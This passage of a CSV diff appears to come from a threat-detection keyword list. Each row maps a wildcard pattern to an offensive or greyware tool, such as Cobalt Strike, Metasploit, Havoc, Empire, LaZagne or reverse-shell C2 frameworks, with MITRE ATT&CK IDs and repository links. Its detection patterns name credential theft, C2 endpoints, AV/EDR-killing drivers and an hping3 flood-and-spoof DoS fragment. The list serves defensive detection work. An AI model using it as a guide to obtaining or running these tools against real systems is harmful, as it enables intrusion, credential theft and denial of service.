+"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*hook-lsassy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" 
+"*hook-pypsrp.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-pypykatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*HOST/EXEGOL-01.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*Host: FUZZ.machine.org*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*HostEnum.ps1*","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. 
it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z"
+"*HostExploiter.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*HostingCLR_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*HostingCLRx64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*houqingv1.0.zip*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" 
+"*hpe_sim_76_amf_deserialization*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*hping2.h*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. 
hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
+"*hping3 -*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
+"*hping3 * --flood --frag --spoof * --destport*","offensive_tool_keyword","hping3","HPING3 DoS","T1498 - T1095 - T1045","TA0040 - TA0001 - TA0043","N/A","N/A","DOS","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*HRShell*client.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
+"*HRShell*server.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
+"*hta_evasion.hta*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*HtaPowershellGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*hta-to-javascript-crypter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*HtaVBSGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*htdigest2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*html/js/beacons.js*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*html/scripts/merlin.js*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" 
+"*Html-Injection-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z"
+"*Html-Injection-Read-File-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z"
+"*HTMLSmuggler-main*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z"
+"*HTool*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","hacktool signatures","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HTool/WCE*","signature_keyword","Antivirus Signature","Generic hacktool Engine signature","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HTool-Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*htrgouvea/nipe*","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z"
+"*htshells-master*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
+"*http* | hakrawler -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*http*.sslip.io*","greyware_tool_keyword","sslip.io","sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 
127-0-0-1.sslip.io maps to 127.0.0.1","T1568.002 - T1048.003","TA0003 - TA0004","N/A","N/A","C2","https://github.com/cunnie/sslip.io","1","1","letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic","6","10","464","64","2023-10-04T15:07:26Z","2015-08-26T18:43:35Z"
+"*http*//127.0.0.1:5001*","greyware_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
+"*http*//localhost:5001*","greyware_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
+"*http*/127.0.0.1*:1337*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 
- TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*http*/charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z"
+"*http*/demon.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*http*/demon.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*http*/demos/butcher/index.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*http*/john/Test/raw/master/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*http*/localhost*:1337*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*http*/zha0gongz1*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode 
with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z"
+"*http*://*/Terminator.sys","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z"
+"*http*://127.0.0.1:4433*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" 
+"*http*://127.0.0.1:5556*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*http*://127.0.0.1:8081*","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*http*://localhost:4433*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*http*://localhost:5556*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*http*://localhost:8081*","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" 
+"*http*:3000/hook.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*http*:3200/manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z"
+"*http*:801/bq1iFEP2*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z"
